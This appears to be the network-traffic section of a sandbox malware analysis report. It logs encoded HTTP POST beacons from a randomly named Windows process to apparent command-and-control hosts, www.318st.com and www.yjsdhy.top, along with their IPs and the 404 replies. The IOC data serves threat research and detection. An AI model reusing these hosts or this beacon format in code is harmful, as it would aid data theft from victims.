Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:46.474639893 CEST	753	OUT	POST /hpj7/ HTTP/1.1 Host: www.318st.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.318st.com Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.318st.com/hpj7/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 61 37 42 45 69 51 77 67 6e 47 79 65 78 71 70 6b 50 42 67 79 6e 6e 35 6d 54 57 36 4e 75 4c 56 5a 41 6d 67 42 48 37 55 6c 76 63 41 59 54 53 71 52 4e 51 66 6f 6a 47 68 77 43 44 63 4d 37 79 77 62 43 42 50 32 6e 77 46 33 6a 33 43 37 42 47 34 68 76 39 35 42 33 31 6a 53 4c 54 65 64 71 4d 56 77 35 71 62 74 75 2f 59 34 54 53 78 32 6b 4e 63 34 4c 7a 6c 45 43 33 78 76 52 56 6e 75 64 7a 76 59 79 37 4d 44 6a 66 69 65 4b 4a 61 2b 62 71 75 32 57 59 52 34 77 32 55 6c 6b 77 52 62 59 70 69 58 56 36 50 36 30 71 67 77 51 35 6b 69 2b 72 76 59 38 56 31 54 47 6c 6b 67 6e 49 49 70 78 61 43 74 6c 44 55 61 56 50 63 3d Data Ascii: 1Dd0AZ=a7BEiQwgnGyexqpkPBgynn5mTW6NuLVZAmgBH7UlvcAYTSqRNQfojGhwCDcM7ywbCBP2nwF3j3C7BG4hv95B31jSLTedqMVw5qbtu/Y4TSx2kNc4LzlEC3xvRVnudzvYy7MDjfieKJa+bqu2WYR4w2UlkwRbYpiXV6P60qgwQ5ki+rvY8V1TGlkgnIIpxaCtlDUaVPc=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50024	107.163.96.57	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:49.160866022 CEST	773	OUT	POST /hpj7/ HTTP/1.1 Host: www.318st.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.318st.com Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.318st.com/hpj7/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 61 37 42 45 69 51 77 67 6e 47 79 65 77 4b 35 6b 49 69 49 79 68 48 34 55 50 47 36 4e 6c 72 56 64 41 6d 6b 42 48 36 41 31 76 75 30 59 4b 7a 61 52 4f 56 72 6f 6b 47 68 77 4e 6a 63 4a 2f 79 77 51 43 42 44 59 6e 79 42 33 6a 33 57 37 42 44 45 68 75 4f 68 43 6d 31 6a 51 48 7a 65 62 33 38 56 77 35 71 62 74 75 2f 38 57 54 53 35 32 6e 39 73 34 4a 52 4e 44 49 58 78 67 59 31 6e 75 5a 7a 76 55 79 37 4d 74 6a 62 6a 46 4b 4b 75 2b 62 72 65 32 58 4a 52 35 72 6d 55 2f 35 41 51 30 51 5a 37 75 5a 61 58 68 2b 72 38 79 43 50 30 6a 37 64 43 79 6d 33 39 37 56 46 49 59 33 62 41 65 67 71 6a 45 2f 67 45 71 4c 59 49 50 51 54 48 51 31 49 44 30 79 57 65 5a 54 68 54 39 6b 31 33 77 Data Ascii: 1Dd0AZ=a7BEiQwgnGyewK5kIiIyhH4UPG6NlrVdAmkBH6A1vu0YKzaROVrokGhwNjcJ/ywQCBDYnyB3j3W7BDEhuOhCm1jQHzeb38Vw5qbtu/8WTS52n9s4JRNDIXxgY1nuZzvUy7MtjbjFKKu+bre2XJR5rmU/5AQ0QZ7uZaXh+r8yCP0j7dCym397VFIY3bAegqjE/gEqLYIPQTHQ1ID0yWeZThT9k13w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50025	107.163.96.57	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:52.032500029 CEST	1790	OUT	POST /hpj7/ HTTP/1.1 Host: www.318st.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.318st.com Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.318st.com/hpj7/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 61 37 42 45 69 51 77 67 6e 47 79 65 77 4b 35 6b 49 69 49 79 68 48 34 55 50 47 36 4e 6c 72 56 64 41 6d 6b 42 48 36 41 31 76 75 4d 59 57 56 4f 52 4f 32 44 6f 6c 47 68 77 45 44 63 49 2f 79 77 33 43 42 62 63 6e 79 64 4a 6a 30 75 37 42 6c 51 68 70 2f 68 43 76 31 6a 51 59 44 65 65 71 4d 56 66 35 71 4b 71 75 2f 73 57 54 53 35 32 6e 2f 30 34 66 54 6c 44 4f 58 78 76 52 56 6e 36 64 7a 75 42 79 36 6b 62 6a 62 6e 56 66 70 32 2b 61 4c 4f 32 61 62 35 35 32 32 55 68 36 41 51 73 51 5a 48 50 5a 61 37 6c 2b 72 4a 58 43 49 59 6a 36 64 48 37 78 45 64 50 45 7a 45 72 6b 35 6f 45 2f 2f 4f 6b 38 57 34 73 57 4a 35 68 54 58 44 6e 36 73 48 33 78 46 6a 71 50 33 53 6e 74 68 47 4e 48 41 6c 4a 46 78 4f 78 33 33 57 54 4d 42 41 4a 34 6f 79 4f 67 45 33 33 2b 74 34 6b 61 38 6f 48 56 35 44 4b 72 55 71 76 4c 4a 6b 70 49 77 4a 53 74 44 34 79 66 68 43 77 71 6a 6f 4c 33 42 36 4f 70 58 50 5a 4f 73 6f 65 69 2f 4b 6d 64 52 64 4f 4c 59 70 2b 70 73 31 43 2f 63 43 70 4c 66 2f 43 57 67 55 57 58 51 44 64 38 62 76 4a 4e 50 73 [TRUNCATED] Data Ascii: 1Dd0AZ=a7BEiQwgnGyewK5kIiIyhH4UPG6NlrVdAmkBH6A1vuMYWVORO2DolGhwEDcI/yw3CBbcnydJj0u7BlQhp/hCv1jQYDeeqMVf5qKqu/sWTS52n/04fTlDOXxvRVn6dzuBy6kbjbnVfp2+aLO2ab5522Uh6AQsQZHPZa7l+rJXCIYj6dH7xEdPEzErk5oE//Ok8W4sWJ5hTXDn6sH3xFjqP3SnthGNHAlJFxOx33WTMBAJ4oyOgE33+t4ka8oHV5DKrUqvLJkpIwJStD4yfhCwqjoL3B6OpXPZOsoei/KmdRdOLYp+ps1C/cCpLf/CWgUWXQDd8bvJNPs5LJkzZgKP+j07fj/35T7n/u89cjT9mmpqsJX4mrSqK3tT+EL+VQdyzMEWbzeFz8/uoPllpwgY1ciiiewhLGcGTfl9/QpdZm6rjEyUq8nCqwq1JSiggY8xe2JGDMa3lq4J85G1VSjDK9vO+KwSS1jE6vHvqayijd4EIpNuC2YyaYmNKpDzthvFvwQO2jyvqiEFLrrCJWiagpgLNfNIh96ujNDKd/N1n2IL3PnouZz7NgIloFW0tAzPXRuMxzqcX+et4vbV1TT0bo0VLfBv+tIuo4R6JykdyKmr9xQmtQCrZT5dywIrAF2Y8RJIk9xtT74D2Hb6Qa8GQOZ7UwPZeGqcrKUmitoecvdE/IJI2Efo4XV9yIMIHXJANSS0/iXRTSTJdUm2/Aiosy/XzdOMaG0t+7IZI41YjF7wiwVs6pY/8xBwVc7FDaOJ39hdm4t+ZCJzVugwCdPQUc9W+ODTGxrpllXLpogJTFWP2vaHotwGB1yz2Q0MDQ0SNG1joCMunENkRIHM+7bv08pbgHPSwjt4bz9SIcbc8B4E/T/Jqh5WFOAJzDAw/V3hOUIWta2TNhkngT1dRjOiKSsAMucfG7QKh8eNAWPzHi1fZB+FLzsLo/OzXyNKJBOxCD+61XYyhkF13AoifAOnt6omyFI4RcW07St55d2QSL2Ty [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50026	107.163.96.57	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:54.575402975 CEST	499	OUT	GET /hpj7/?-n1P=0hFdS6&1Dd0AZ=X5pkhncivmKNwc5IHzwKv2V+WlWG/NRpDmwvfoQjjuJNRlGXFXD+t3RxF1NKvRE2Xyic5AtQwV6vRmAQ2NBYpUrTbxGdn/5d8rnNk74oeipYn988AGhjCztrSCL7Uz3dwQ== HTTP/1.1 Host: www.318st.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:31:55.139703989 CEST	141	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:31:53 GMT Content-Type: text/html Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50027	45.197.45.172	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:32:01.417202950 CEST	756	OUT	POST /tsl3/ HTTP/1.1 Host: www.yjsdhy.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.yjsdhy.top Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.yjsdhy.top/tsl3/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 53 64 54 35 2b 4c 69 56 58 68 36 6f 31 55 37 55 4c 4f 7a 4f 41 43 38 4b 4d 6d 39 4d 4d 4f 59 74 4d 6a 4e 6b 72 35 4e 41 52 4d 38 75 70 5a 70 56 51 34 75 77 38 38 62 4e 70 34 4d 38 50 30 4d 6c 67 63 69 39 74 53 7a 63 58 67 64 55 56 62 67 50 30 52 33 48 47 49 6b 4d 77 42 76 66 74 4a 54 6c 53 70 62 36 53 6d 4c 50 31 4b 44 49 68 34 58 47 66 49 77 66 4c 48 68 56 66 49 32 66 56 51 45 74 6b 51 31 30 65 34 63 57 72 7a 42 71 45 69 6f 41 53 78 6d 7a 59 50 35 2f 58 45 6d 62 70 7a 38 4c 69 4a 4e 43 68 52 41 65 35 76 6b 4e 6e 53 32 47 32 46 66 61 33 73 51 50 63 44 33 70 47 58 4b 41 44 6c 6d 50 39 59 38 3d Data Ascii: 1Dd0AZ=SdT5+LiVXh6o1U7ULOzOAC8KMm9MMOYtMjNkr5NARM8upZpVQ4uw88bNp4M8P0Mlgci9tSzcXgdUVbgP0R3HGIkMwBvftJTlSpb6SmLP1KDIh4XGfIwfLHhVfI2fVQEtkQ10e4cWrzBqEioASxmzYP5/XEmbpz8LiJNChRAe5vkNnS2G2Ffa3sQPcD3pGXKADlmP9Y8=
Oct 9, 2024 16:32:02.302668095 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:32:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66e7a146-8ac0" Content-Encoding: gzip Data Raw: 32 37 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 14 47 92 e8 e7 c1 6c ff 43 4e 6b 66 1b cc d4 47 56 d6 29 a0 d7 10 42 f3 d6 de be 79 f3 76 67 cd 76 6d 6d 0d cb 23 f2 be 33 eb d4 ca ac 1b 04 34 d0 5c c3 2d 5a 5c 02 81 0e 1a 10 08 9a 6e 10 ff 45 d3 59 55 fd 49 7f e1 79 64 64 55 65 d6 d1 5d d5 dd 68 c6 76 16 21 2a 8f c8 38 3c dc 3d dc 3d 3c dc 77 ed fb f5 47 ff f7 e0 1f ff fd 0f 87 28 d9 37 f4 99 5d fb f0 0f a5 b3 a6 b4 7f ac 26 4f f0 e6 18 7e 86 58 01 7e 0c e4 b3 14 2f b3 ae 87 fc fd 63 45 5f 9c c8 e3 b7 e1 63 d9 f7 ed 09 e4 14 95 d2 fe b1 7f 9b f8 d7 03 13 07 2d c3 66 7d 85 d3 d1 18 c5 5b a6 8f 4c f8 e6 1f 0f ed 47 82 84 da 5f 99 ac 81 f6 8f b9 c8 14 90 8b dc 58 c1 32 e2 34 c5 ef 2a 57 52 50 d9 b6 5c 3f 5e 4e 11 7c 79 bf 80 4a 0a 8f 26 ca f8 e6 7d 4a 31 15 5f 61 f5 09 8f 67 75 b4 9f 9e 9c ee db c9 3f 1c f8 dd a1 89 43 bf ff e3 a1 7f 8e 55 f7 cf a8 84 58 fd 8f 2e 6b 7a bb 3f 2a ba d0 7f cb dc 3f fd 7e f8 00 2a 85 1b 7a 0f ae cd 57 7c 1d cd fc fd 7b 95 3c 9d 3b b4 17 7e 33 4c e6 00 fe cd 1e [TRUNCATED] Data Ascii: 275b}iGlCNkfGV)Byvgvmm#34\-Z\nEYUIyddUe]hv!8<==<wG(7]&O~X~/cE_c-f}[LG_X24WRP\?^N\|yJ&}J1_agu?CUX.kz??~zW\|{<;~3LLNEC&i0u0zgT}SJ-Wb\|X\|Lbs <bp pSq?QH2D\|Tv]LT(d:y&_g\8c2~?nip)&l\|x_h2GdfBhDa>Q\|]67"R6&f9@H)G"?F}8Nc-LB%Y8QGJ=tDt\|:3=l+'YPLXM9"}Wu6pNU) H%e~kEQ"$lz.8k"kN5wM32B}%T)E?aE~D.!I1'&fB35A_Ju!WRJoa6/ gj)=\Xe]UQB2Ru/\+BQh#KC]iew)XGj,ru2>(\|]4U [TRUNCATED]
Oct 9, 2024 16:32:02.302732944 CEST	1236	IN	Data Raw: 0c 2f ef 9b 62 a1 8e 29 5d e9 74 28 d9 a0 65 c3 0a 5a ce 6b e2 b6 1a 44 51 83 87 4c 49 57 bc 7e ad ee 9b 2a 82 d4 10 41 6e 0a 20 1d c1 bc 75 b9 8f 5c 00 e2 60 4c 9a d9 f5 2b 3c c4 4f 64 a4 48 b2 ff 01 c5 a4 ed ca de f0 6b 0e 96 36 e4 4e 70 96 ef Data Ascii: /b)]t(eZkDQLIW~*An u\`L+<OdHk6Np[mW(z{?%RD\|"xGjw\|"(@BnO,R=d~@ .vu1H>X]&3tzgtc^T{8h=i
Oct 9, 2024 16:32:02.302767992 CEST	1236	IN	Data Raw: e0 dc a9 fa e2 4a 70 fd e1 68 2d c9 79 5b 93 2a a6 26 f6 0c a5 e8 59 2c cc 84 58 b3 a0 25 cc db 9e cc 35 ef 6e 8e ff 71 d5 66 cb 5c 47 e0 84 9c 55 d1 65 27 c1 75 24 cd 49 4b be 0d 82 7d 9f 75 82 d0 ad 6a 72 25 ce 92 41 c2 00 ec 01 19 72 fd ea 6a Data Ascii: Jph-y[&Y,X%5nqf\GUe'u$IK}ujr%Arj?kbT@:U56g`6XFW`4\a9%o5r6m`G5CWSdd`Z9KS]WB~Z696tyZuCdZ0zy}e
Oct 9, 2024 16:32:02.302803040 CEST	1236	IN	Data Raw: e0 61 c7 71 1b 4c c1 cb 79 b2 e6 6b 5e 76 e4 69 c5 52 5c ba a4 a9 bd 7b 06 3b 65 bd 46 a6 a9 95 11 03 ce ef 5d a4 fa 17 b6 5e d3 06 c7 eb 76 3e ad 26 64 84 74 81 f5 54 55 48 f7 f5 49 18 c9 7a 5d e6 8c 54 d9 41 e0 64 b4 65 6a d5 0d 1e 71 2a 57 00 Data Ascii: aqLyk^viR\{;eF]^v>&dtTUHIz]TAdejqWZwzbR@DZf y`6)Nc!MJ.kRe5+RyCz2":y:eJ85y&E*_a,pNB)B#rbK3W?/
Oct 9, 2024 16:32:02.302834988 CEST	1236	IN	Data Raw: 10 c1 6f 0c ce dd 24 3d 79 e0 3c 64 e8 ed d5 2e 38 41 e7 41 a6 cf 77 a8 d3 63 d5 54 46 b3 15 70 14 ea 14 12 90 c8 16 f5 6e af b3 96 be 15 ca 81 31 55 4b 83 03 57 8e c8 ca 7a 5c ee 4d f4 23 fc a2 b3 56 9b e0 00 9a 97 58 d8 83 08 85 a2 bf 02 89 a5 Data Ascii: o$=y<d.8AAwcTFpn1UKWz\M#VX-_,z2[[.ooLn#aDl?sz*xz;A+_/_oaUkKYNjH?q1jgc6Wdc?/L!@
Oct 9, 2024 16:32:02.302870035 CEST	1236	IN	Data Raw: 8b 00 56 0b de 5e 0f 4e dc 6e 3c 5d 25 b3 5f bf 06 32 4d 07 19 42 dc 58 6d 7e 35 07 ea 45 7d e5 3c 26 a3 45 38 f1 df 35 65 1b 05 f7 48 da 9f 54 38 44 62 42 ac 01 7e 58 82 d0 e1 d8 a3 61 da b6 31 04 41 4c f7 33 94 47 22 4a fd fc 62 e3 f4 79 12 29 Data Ascii: V^Nn<]%_2MBXm~5E}<&E85eHT8DbB~Xa1AL3G"Jby)! II~#c#IlKrTjBMRyT_58uq!p`@T?2iny`&0!W}gtTv?k/?i8Kzzm<1HSM
Oct 9, 2024 16:32:02.302902937 CEST	1236	IN	Data Raw: 1e 5d db 50 91 b8 15 92 00 85 c5 a7 45 1c b1 f4 39 c4 c1 c5 6a 62 07 d5 1d 55 90 e4 54 b9 e2 8e b0 12 80 dc 54 86 10 fc 92 25 5b ac c1 87 d2 12 f1 c5 25 e2 14 78 e2 d2 f9 e9 7c 2a df be a0 73 4c 2e 95 3b 9c a6 99 f4 e8 0a 4b 82 09 8c 36 ca 96 54 Data Ascii: ]PE9jbUTT%[%x\|*sL.;K6T4C`eS>X[lp-V!]po+cURDl=LGbf992-W{R\|6hcP/4A^gC(z!ke\|[;mXHQ
Oct 9, 2024 16:32:02.302938938 CEST	1236	IN	Data Raw: 30 df 48 e6 df ea 54 1f f6 29 86 46 a6 9c 42 10 4e 21 0b e1 a1 7a 70 27 16 ca 0c 70 67 c3 ed 03 16 12 71 f4 43 a8 18 92 4b 79 04 61 11 7d 7a a3 63 1b ed 7e 76 23 66 77 9a 8d 51 46 e8 65 8a b6 aa ab 90 5d a3 67 84 b1 10 64 38 95 40 2c 81 c6 26 83 Data Ascii: 0HT)FBN!zp'pgqCKya}zc~v#fwQFe]gd8@,&)Y"$yl_7H.>bH5)Gh.4d-=3@dNd4RV8x\|F\!,&R\v,YwM95n2W66CgE)j,3tcfuj%2
Oct 9, 2024 16:32:02.302973986 CEST	422	IN	Data Raw: 85 df ac b9 d8 e4 0d 9e bb dd 62 d1 0c b7 6f 77 ff 66 4f 6c 4a c3 69 25 31 2c 0e 7b 65 05 43 01 43 bb 03 6f 5c 60 6a 0a 67 c3 7c 73 b1 f1 6a 0e fe 5d 5b f9 13 24 d5 4d 96 68 55 de 53 57 b2 58 57 c3 b8 ee 12 eb 52 b2 65 a0 c3 b0 8e 49 d4 7e 0a 12 Data Ascii: bowfOlJi%1,{eCCo\`jg\|sj][$MhUSWXWReI~,MA?0>O'U>hI<lqEg`x`~{=0HStpSEu_He0pGU6n:S^if7Nq@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50028	45.197.45.172	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:32:03.971012115 CEST	776	OUT	POST /tsl3/ HTTP/1.1 Host: www.yjsdhy.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.yjsdhy.top Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.yjsdhy.top/tsl3/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 53 64 54 35 2b 4c 69 56 58 68 36 6f 30 30 72 55 4a 74 62 4f 58 53 38 4c 51 32 39 4d 44 75 59 70 4d 6a 52 6b 72 37 68 51 52 2f 59 75 70 34 5a 56 52 39 53 77 31 73 62 4e 38 49 4d 39 52 45 4d 36 67 63 2b 44 74 51 6e 63 58 67 68 55 56 5a 49 50 30 67 33 41 48 59 6b 4b 38 68 76 64 79 5a 54 6c 53 70 62 36 53 6d 50 68 31 4b 62 49 68 49 6e 47 4e 64 4d 63 4e 33 68 4b 4c 59 32 66 44 67 45 78 6b 51 31 57 65 35 51 76 72 32 4e 71 45 6a 59 41 53 69 2b 38 58 50 35 35 54 45 6e 33 74 78 52 54 75 49 4e 37 72 67 4e 4e 67 4d 6f 62 6d 6b 62 73 73 6e 58 79 6b 4d 38 33 4d 51 2f 65 58 6e 72 70 5a 47 32 2f 6a 50 70 54 38 6a 43 59 61 50 50 4f 50 71 4b 4d 35 48 62 75 49 2f 70 35 Data Ascii: 1Dd0AZ=SdT5+LiVXh6o00rUJtbOXS8LQ29MDuYpMjRkr7hQR/Yup4ZVR9Sw1sbN8IM9REM6gc+DtQncXghUVZIP0g3AHYkK8hvdyZTlSpb6SmPh1KbIhInGNdMcN3hKLY2fDgExkQ1We5Qvr2NqEjYASi+8XP55TEn3txRTuIN7rgNNgMobmkbssnXykM83MQ/eXnrpZG2/jPpT8jCYaPPOPqKM5HbuI/p5
Oct 9, 2024 16:32:04.856770992 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:32:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66e7a146-8ac0" Content-Encoding: gzip Data Raw: 32 37 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 14 47 92 e8 e7 c1 6c ff 43 4e 6b 66 1b cc d4 47 56 d6 29 a0 d7 10 42 f3 d6 de be 79 f3 76 67 cd 76 6d 6d 0d cb 23 f2 be 33 eb d4 ca ac 1b 04 34 d0 5c c3 2d 5a 5c 02 81 0e 1a 10 08 9a 6e 10 ff 45 d3 59 55 fd 49 7f e1 79 64 64 55 65 d6 d1 5d d5 dd 68 c6 76 16 21 2a 8f c8 38 3c dc 3d dc 3d 3c dc 77 ed fb f5 47 ff f7 e0 1f ff fd 0f 87 28 d9 37 f4 99 5d fb f0 0f a5 b3 a6 b4 7f ac 26 4f f0 e6 18 7e 86 58 01 7e 0c e4 b3 14 2f b3 ae 87 fc fd 63 45 5f 9c c8 e3 b7 e1 63 d9 f7 ed 09 e4 14 95 d2 fe b1 7f 9b f8 d7 03 13 07 2d c3 66 7d 85 d3 d1 18 c5 5b a6 8f 4c f8 e6 1f 0f ed 47 82 84 da 5f 99 ac 81 f6 8f b9 c8 14 90 8b dc 58 c1 32 e2 34 c5 ef 2a 57 52 50 d9 b6 5c 3f 5e 4e 11 7c 79 bf 80 4a 0a 8f 26 ca f8 e6 7d 4a 31 15 5f 61 f5 09 8f 67 75 b4 9f 9e 9c ee db c9 3f 1c f8 dd a1 89 43 bf ff e3 a1 7f 8e 55 f7 cf a8 84 58 fd 8f 2e 6b 7a bb 3f 2a ba d0 7f cb dc 3f fd 7e f8 00 2a 85 1b 7a 0f ae cd 57 7c 1d cd fc fd 7b 95 3c 9d 3b b4 17 7e 33 4c e6 00 fe cd 1e [TRUNCATED] Data Ascii: 275b}iGlCNkfGV)Byvgvmm#34\-Z\nEYUIyddUe]hv!8<==<wG(7]&O~X~/cE_c-f}[LG_X24WRP\?^N\|yJ&}J1_agu?CUX.kz??~zW\|{<;~3LLNEC&i0u0zgT}SJ-Wb\|X\|Lbs <bp pSq?QH2D\|Tv]LT(d:y&_g\8c2~?nip)&l\|x_h2GdfBhDa>Q\|]67"R6&f9@H)G"?F}8Nc-LB%Y8QGJ=tDt\|:3=l+'YPLXM9"}Wu6pNU) H%e~kEQ"$lz.8k"kN5wM32B}%T)E?aE~D.!I1'&fB35A_Ju!WRJoa6/ gj)=\Xe]UQB2Ru/\+BQh#KC]iew)XGj,ru2>(\|]4U [TRUNCATED]
Oct 9, 2024 16:32:04.856791973 CEST	1236	IN	Data Raw: 0c 2f ef 9b 62 a1 8e 29 5d e9 74 28 d9 a0 65 c3 0a 5a ce 6b e2 b6 1a 44 51 83 87 4c 49 57 bc 7e ad ee 9b 2a 82 d4 10 41 6e 0a 20 1d c1 bc 75 b9 8f 5c 00 e2 60 4c 9a d9 f5 2b 3c c4 4f 64 a4 48 b2 ff 01 c5 a4 ed ca de f0 6b 0e 96 36 e4 4e 70 96 ef Data Ascii: /b)]t(eZkDQLIW~*An u\`L+<OdHk6Np[mW(z{?%RD\|"xGjw\|"(@BnO,R=d~@ .vu1H>X]&3tzgtc^T{8h=i
Oct 9, 2024 16:32:04.856803894 CEST	448	IN	Data Raw: e0 dc a9 fa e2 4a 70 fd e1 68 2d c9 79 5b 93 2a a6 26 f6 0c a5 e8 59 2c cc 84 58 b3 a0 25 cc db 9e cc 35 ef 6e 8e ff 71 d5 66 cb 5c 47 e0 84 9c 55 d1 65 27 c1 75 24 cd 49 4b be 0d 82 7d 9f 75 82 d0 ad 6a 72 25 ce 92 41 c2 00 ec 01 19 72 fd ea 6a Data Ascii: Jph-y[&Y,X%5nqf\GUe'u$IK}ujr%Arj?kbT@:U56g`6XFW`4\a9%o5r6m`G5CWSdd`Z9KS]WB~Z696tyZuCdZ0zy}e
Oct 9, 2024 16:32:04.856815100 CEST	1236	IN	Data Raw: 1c a8 e1 78 93 69 6c ca 43 ac cb cb 53 63 14 6c ae c9 16 68 34 b6 e5 25 35 72 10 a7 15 d3 2e fa 50 37 de 43 8b 76 87 e2 86 61 d8 26 89 ec 93 2c 27 b1 45 49 aa 49 60 0b 83 4f a0 ec 58 68 7c 25 ad 4c b4 bf 0d 8d 46 fb c7 88 59 ea 3d 9e e7 c7 a8 12 Data Ascii: xilCSclh4%5r.P7Cva&,'EII`OXh\|%LFY=)9FYhEn_VI~8)0O8~U6H`&,1x{E}h^V8Iu$qx!qY}Q=GAkS2,Q#)O7^U,p^Wf
Oct 9, 2024 16:32:04.856826067 CEST	1236	IN	Data Raw: c9 f9 46 d6 91 14 aa 02 5e d0 a1 33 39 f1 22 a7 3a 87 16 14 ec cd db c1 17 39 95 74 ee 98 82 07 b1 b7 6e ec 06 fa d9 da cf 93 6b 92 97 01 83 29 ec 91 9f 3b bf f6 e3 8d fa e2 2c 18 6a 1b 9f 7f 46 fc 68 88 a3 0e 78 ba d4 e7 c0 0b cb 6e d5 91 d8 e3 Data Ascii: F^39":9tnk);,jFhxn74-I?-8f7{vd\|=ShX}TxKGvqh%&PL,$v~]R~^~-Li,^[~\|udS7`svi!Yj2
Oct 9, 2024 16:32:04.856837034 CEST	1236	IN	Data Raw: b8 87 60 0a 3e 6b 68 19 b9 94 e9 21 98 42 7d 71 9e ce d4 af 62 12 80 e5 04 1b 5e 60 3d a9 2f 9e 69 3e 5f 5e 7b fd 39 e1 f3 41 68 ed a9 bf 98 6f 3e c7 7a 38 9c e6 0b 6e 9d 0d 96 8f ac 2d af d6 4f be c5 0a d1 c2 0a ac 27 c1 ea 4a 73 e9 47 a2 bd e3 Data Ascii: `>kh!B}qb^`=/i>_^{9Aho>z8n-O'JsG3Gp8Ap~`UptTJcNNfcLb)\I$R$ps:,iQrqbZg*-71x5aC`r9cycw\>\|B^6FK%U
Oct 9, 2024 16:32:04.856848955 CEST	1236	IN	Data Raw: f5 1b cf 83 53 b7 1b df cc 81 b5 93 a8 b2 c1 c2 15 b0 03 35 4f 7e 8f f9 3d 08 32 20 a1 9c 3b 02 25 83 cb c7 81 33 63 7c 7f 76 19 4a 92 45 80 2c 63 c0 e4 9b a7 9f c2 c3 c6 a3 93 74 06 8c 3e 70 09 74 82 c9 09 74 cf 85 15 6c 34 05 53 d1 c9 57 8d 07 Data Ascii: S5O~=2 ;%3c\|vJE,ct>pttl4SWT-U" Y@N@RZ#kP[fpZ*AF1wp:OWk@CF//-e}v0QXI17$a6$`NJ`[o)ah.0
